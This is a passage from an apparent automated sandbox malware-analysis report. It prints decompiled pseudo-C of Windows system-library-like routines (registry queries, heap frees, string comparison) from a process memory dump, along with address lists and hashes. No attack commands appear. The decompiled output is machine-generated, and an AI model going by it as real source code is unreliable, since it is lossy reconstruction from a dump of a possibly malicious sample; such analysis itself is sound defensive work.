							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E055E9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E055E95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x5697b9c; // 0x0
									_t92 = L055C4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E055E9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E055AA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0563E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0563E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E055E95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                        0x0563b8d9
                                                                        0x0563b8e4
                                                                        0x00000000
                                                                        0x0563b8e6
                                                                        0x0563b8f3
                                                                        0x0563b8f5
                                                                        0x0563b8f5
                                                                        0x0563b8f8
                                                                        0x0563b920
                                                                        0x0563b924
                                                                        0x0563b936
                                                                        0x0563b939
                                                                        0x0563b93d
                                                                        0x0563b948
                                                                        0x0563b9a0
                                                                        0x0563b9a0
                                                                        0x0563b9a4
                                                                        0x0563b9bf
                                                                        0x0563b9c4
                                                                        0x0563b9c6
                                                                        0x0563b9cd
                                                                        0x0563b9d1
                                                                        0x0563bad4
                                                                        0x0563bad8
                                                                        0x0563bada
                                                                        0x0563badc
                                                                        0x0563badc
                                                                        0x0563badf
                                                                        0x0563bae0
                                                                        0x0563bae2
                                                                        0x0563bae4
                                                                        0x0563baec
                                                                        0x0563baee
                                                                        0x0563baf0
                                                                        0x0563baf0
                                                                        0x0563baec
                                                                        0x0563bafb
                                                                        0x0563bafc
                                                                        0x0563bafe
                                                                        0x0563bb01
                                                                        0x0563bb01
                                                                        0x00000000
                                                                        0x0563bb06
                                                                        0x0563b9d7
                                                                        0x0563b9db
                                                                        0x0563b9db
                                                                        0x0563b9de
                                                                        0x0563b9de
                                                                        0x0563b9e4
                                                                        0x0563b9e7
                                                                        0x0563b9ea
                                                                        0x0563b9ec
                                                                        0x0563b9ef
                                                                        0x0563b9f3
                                                                        0x0563ba1b
                                                                        0x0563ba1b
                                                                        0x0563ba23
                                                                        0x0563ba24
                                                                        0x0563ba27
                                                                        0x0563ba2a
                                                                        0x0563ba2b
                                                                        0x0563ba2e
                                                                        0x0563ba30
                                                                        0x0563ba37
                                                                        0x0563ba3f
                                                                        0x0563ba9c
                                                                        0x0563baa2
                                                                        0x0563bb13
                                                                        0x0563bb15
                                                                        0x0563baae
                                                                        0x0563baae
                                                                        0x0563bab3
                                                                        0x0563bab5
                                                                        0x0563baba
                                                                        0x0563bac8
                                                                        0x0563bac8
                                                                        0x0563baba
                                                                        0x0563bacd
                                                                        0x0563bacf
                                                                        0x00000000
                                                                        0x0563bacf
                                                                        0x0563bb1a
                                                                        0x00000000
                                                                        0x0563bb1c
                                                                        0x0563baa7
                                                                        0x0563bb11
                                                                        0x00000000
                                                                        0x0563bb11
                                                                        0x0563baa9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0563ba41
                                                                        0x0563ba41
                                                                        0x0563ba41
                                                                        0x0563ba58
                                                                        0x0563ba5d
                                                                        0x0563ba62
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0563ba64
                                                                        0x0563ba67
                                                                        0x0563ba68
                                                                        0x0563ba69
                                                                        0x0563ba6c
                                                                        0x0563ba6f
                                                                        0x0563ba71
                                                                        0x0563ba78
                                                                        0x0563ba80
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0563ba90
                                                                        0x0563ba90
                                                                        0x0563ba97
                                                                        0x00000000
                                                                        0x0563ba97
                                                                        0x0563b9f5
                                                                        0x0563b9f7
                                                                        0x0563b9f7
                                                                        0x0563b9fa
                                                                        0x0563ba03
                                                                        0x0563ba07
                                                                        0x0563ba0c
                                                                        0x0563ba10
                                                                        0x0563ba17
                                                                        0x00000000
                                                                        0x0563b9f7
                                                                        0x0563b9a6
                                                                        0x0563b9a8
                                                                        0x0563b9af
                                                                        0x0563b9b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0563b9b9
                                                                        0x00000000
                                                                        0x0563b9b9
                                                                        0x0563b94d
                                                                        0x0563b98f
                                                                        0x0563b995
                                                                        0x0563b999
                                                                        0x0563b960
                                                                        0x0563b967
                                                                        0x0563b968
                                                                        0x0563b96a
                                                                        0x00000000
                                                                        0x0563b96a
                                                                        0x0563b99b
                                                                        0x0563b99e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0563b99e
                                                                        0x0563b951
                                                                        0x0563b954
                                                                        0x0563b95a
                                                                        0x0563b95e
                                                                        0x0563b972
                                                                        0x0563b979
                                                                        0x0563b97d
                                                                        0x0563b97f
                                                                        0x0563b980
                                                                        0x0563b982
                                                                        0x0563b984
                                                                        0x00000000
                                                                        0x0563b984
                                                                        0x00000000
                                                                        0x0563b926
                                                                        0x00000000
                                                                        0x0563b926

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d990a0a154cc22433699f3114df2d599f6808f6308c110833de302f2ca1ad9c8
                                                                        • Instruction ID: c5bb67e4ac5f0cf711dd07539bfa2370b24f8bf2186721743c513979e5b5613a
                                                                        • Opcode Fuzzy Hash: d990a0a154cc22433699f3114df2d599f6808f6308c110833de302f2ca1ad9c8
                                                                        • Instruction Fuzzy Hash: E371CE72200B06AFD721CF15C84AF66BBF6FF84720F154528E6568BAA0EB75E941CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055A52A5 Relevance: .2, Instructions: 161COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E055A52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E055BEEF0(0x56979a0);
					_t104 =  *0x5698210; // 0x5072c98
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E055BEB70(_t93, 0x56979a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E055E9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E055BEEF0(0x56979a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E055BEB70(0, 0x56979a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x5072ca5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E055DF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E055BEEF0(0x56979a0);
									__eflags =  *0x5698210 - _t104; // 0x5072c98
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x5698210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E05624888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E055BEB70(_t95, 0x56979a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E055E95D0();
											L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E055E95D0();
											L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E055BEB70(_t93, 0x56979a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E055E95D0();
										L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E055E95D0();
										L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E055DF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                        0x055a52a5
                                                                        0x055a52ad
                                                                        0x055a52b0
                                                                        0x055a52b3
                                                                        0x055a52b7
                                                                        0x055a52ba
                                                                        0x055a52bf
                                                                        0x055a52c4
                                                                        0x055a52cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055a52ce
                                                                        0x055a52d9
                                                                        0x055a52dd
                                                                        0x055a52e7
                                                                        0x055a52f7
                                                                        0x055a52f9
                                                                        0x055a52fd
                                                                        0x05600dcf
                                                                        0x05600dd5
                                                                        0x05600dd6
                                                                        0x05600dd7
                                                                        0x05600dd8
                                                                        0x05600dd9
                                                                        0x05600dde
                                                                        0x05600ddf
                                                                        0x05600de0
                                                                        0x05600de1
                                                                        0x05600de2
                                                                        0x05600de5
                                                                        0x05600dea
                                                                        0x05600dec
                                                                        0x05600f60
                                                                        0x05600f64
                                                                        0x05600f70
                                                                        0x05600f76
                                                                        0x05600f79
                                                                        0x05600f79
                                                                        0x00000000
                                                                        0x05600f64
                                                                        0x05600df2
                                                                        0x05600df7
                                                                        0x05600e04
                                                                        0x05600e0d
                                                                        0x05600e0d
                                                                        0x05600e10
                                                                        0x05600e1a
                                                                        0x05600e1c
                                                                        0x05600e4c
                                                                        0x05600e52
                                                                        0x05600e61
                                                                        0x05600e67
                                                                        0x05600e6b
                                                                        0x05600e70
                                                                        0x05600e76
                                                                        0x05600ed7
                                                                        0x05600edc
                                                                        0x05600ee0
                                                                        0x05600ee6
                                                                        0x05600eea
                                                                        0x05600eed
                                                                        0x05600ef0
                                                                        0x05600ef3
                                                                        0x05600ef6
                                                                        0x05600ef9
                                                                        0x05600efe
                                                                        0x05600f01
                                                                        0x05600f01
                                                                        0x05600f0b
                                                                        0x05600f12
                                                                        0x05600f16
                                                                        0x05600f18
                                                                        0x05600f1b
                                                                        0x05600f2c
                                                                        0x05600f31
                                                                        0x05600f31
                                                                        0x05600f35
                                                                        0x05600f39
                                                                        0x05600f3a
                                                                        0x05600f3c
                                                                        0x05600f3f
                                                                        0x05600f50
                                                                        0x05600f55
                                                                        0x05600f55
                                                                        0x05600f59
                                                                        0x055a52eb
                                                                        0x055a52f1
                                                                        0x055a52f1
                                                                        0x05600e7d
                                                                        0x05600e84
                                                                        0x05600e88
                                                                        0x05600e8a
                                                                        0x05600e8d
                                                                        0x05600e9e
                                                                        0x05600ea3
                                                                        0x05600ea3
                                                                        0x05600ea7
                                                                        0x05600eaf
                                                                        0x05600eb3
                                                                        0x05600eb9
                                                                        0x05600eb9
                                                                        0x05600ebc
                                                                        0x05600ecd
                                                                        0x05600ecd
                                                                        0x00000000
                                                                        0x05600eb3
                                                                        0x05600e21
                                                                        0x05600e2b
                                                                        0x05600e2f
                                                                        0x05600e30
                                                                        0x05600e3a
                                                                        0x05600e3f
                                                                        0x05600e41
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05600e47
                                                                        0x00000000
                                                                        0x05600e47
                                                                        0x05600df9
                                                                        0x05600dfe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05600dfe
                                                                        0x055a5303
                                                                        0x055a5307
                                                                        0x00000000
                                                                        0x055a5309
                                                                        0x00000000
                                                                        0x055a5309
                                                                        0x055a5307
                                                                        0x055a52e9
                                                                        0x055a52e9
                                                                        0x00000000
                                                                        0x055a52e9
                                                                        0x055a530e
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb4c84cd5c13e150c037fa8237b3e86c12742698c5eb20aaa6000e8cf8929b8e
                                                                        • Instruction ID: a52858a976f9dd2ec38bfdf28cf7d8ff3a95f5ae103cb0d36afd1a0f1cf74137
                                                                        • Opcode Fuzzy Hash: fb4c84cd5c13e150c037fa8237b3e86c12742698c5eb20aaa6000e8cf8929b8e
                                                                        • Instruction Fuzzy Hash: CB51D1712097429FDB25DF64C849F6BBBE9FF84720F14091EE49687A90E770E804CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D2AE4 Relevance: .2, Instructions: 159COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055D2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x5698204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x5698208; // 0x5698207
				_t8 = _t57 + 0x5698208; // 0x5698207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x5698450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x569821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x5696d5c; // 0xff080654
							_t72 =  *0x5696d5c; // 0xff080654
							_t75 =  *0x5696d5c; // 0xff080654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x5696d5c; // 0xff080654
							_t84 =  *0x5696d5c; // 0xff080654
							_t87 =  *0x5696d5c; // 0xff080654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E055EF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                        0x055d2ae4
                                                                        0x055d2aec
                                                                        0x055d2aef
                                                                        0x055d2af4
                                                                        0x055d2af7
                                                                        0x055d2afd
                                                                        0x055d2b92
                                                                        0x055d2b92
                                                                        0x055d2b97
                                                                        0x055d2b9c
                                                                        0x055d2b9c
                                                                        0x055d2b03
                                                                        0x055d2b06
                                                                        0x055d2b09
                                                                        0x055d2b09
                                                                        0x055d2b0f
                                                                        0x055d2b15
                                                                        0x055d2b15
                                                                        0x055d2b1b
                                                                        0x055d2b1e
                                                                        0x055d2b21
                                                                        0x055d2b26
                                                                        0x055d2b29
                                                                        0x055d2b81
                                                                        0x055d2b84
                                                                        0x055d2c0e
                                                                        0x055d2c15
                                                                        0x055d2c24
                                                                        0x055d2c24
                                                                        0x055d2b8a
                                                                        0x055d2b8a
                                                                        0x055d2b8a
                                                                        0x055d2b8a
                                                                        0x055d2b90
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2b4a
                                                                        0x055d2b4a
                                                                        0x055d2b4d
                                                                        0x055d2b53
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2b55
                                                                        0x055d2b58
                                                                        0x055d2bb7
                                                                        0x05615d1b
                                                                        0x05615d37
                                                                        0x05615d47
                                                                        0x05615d53
                                                                        0x055d2bbd
                                                                        0x055d2bbd
                                                                        0x055d2bbd
                                                                        0x055d2bb7
                                                                        0x055d2b5d
                                                                        0x055d2c2f
                                                                        0x05615d5b
                                                                        0x05615d77
                                                                        0x05615d87
                                                                        0x05615d93
                                                                        0x055d2c35
                                                                        0x055d2c35
                                                                        0x055d2c35
                                                                        0x055d2c2f
                                                                        0x055d2b65
                                                                        0x055d2b9f
                                                                        0x055d2ba2
                                                                        0x055d2b67
                                                                        0x055d2b67
                                                                        0x055d2b69
                                                                        0x055d2b6b
                                                                        0x055d2b6e
                                                                        0x055d2bc9
                                                                        0x055d2bcc
                                                                        0x055d2bcf
                                                                        0x055d2bd4
                                                                        0x055d2bd6
                                                                        0x055d2bd6
                                                                        0x055d2bdb
                                                                        0x055d2c02
                                                                        0x055d2c05
                                                                        0x055d2c07
                                                                        0x00000000
                                                                        0x055d2c07
                                                                        0x055d2be0
                                                                        0x055d2c00
                                                                        0x055d2c3f
                                                                        0x055d2c3f
                                                                        0x00000000
                                                                        0x055d2c00
                                                                        0x055d2be5
                                                                        0x055d2be7
                                                                        0x055d2bec
                                                                        0x055d2bf4
                                                                        0x055d2bf6
                                                                        0x00000000
                                                                        0x055d2bf6
                                                                        0x055d2b70
                                                                        0x055d2b76
                                                                        0x055d2b2b
                                                                        0x055d2b2b
                                                                        0x055d2b2d
                                                                        0x055d2b2f
                                                                        0x055d2b32
                                                                        0x055d2b35
                                                                        0x055d2b3a
                                                                        0x00000000
                                                                        0x055d2b40
                                                                        0x055d2b43
                                                                        0x055d2b45
                                                                        0x055d2b47
                                                                        0x055d2b4a
                                                                        0x055d2b4d
                                                                        0x055d2b53
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2b53
                                                                        0x055d2b78
                                                                        0x055d2b78
                                                                        0x055d2b7b
                                                                        0x055d2b7e
                                                                        0x00000000
                                                                        0x055d2b7e
                                                                        0x055d2b76
                                                                        0x055d2ba5
                                                                        0x055d2ba5
                                                                        0x055d2ba8
                                                                        0x055d2bad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2baf
                                                                        0x055d2baf
                                                                        0x055d2bc2
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef68ea38025c70b832190ae8cb7ea084e8c2d543d553785bc4a4e52b9e640c80
                                                                        • Instruction ID: 1d5be911f39848e5eceab5d0478fbfd8b3664549e5d5a450f505f815650c0d12
                                                                        • Opcode Fuzzy Hash: ef68ea38025c70b832190ae8cb7ea084e8c2d543d553785bc4a4e52b9e640c80
                                                                        • Instruction Fuzzy Hash: FA51A07BA10129DFDB24CF1CC4909BDF7B6FB88700B15845AE856DB364D770AA51CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0566AE44 Relevance: .2, Instructions: 152COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E0566AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0566C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0566ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0566FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0566EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E055C7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E05661608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E05671536(0x5698ae4, (_t74 -  *0x5698b04 >> 0x14) + (_t74 -  *0x5698b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
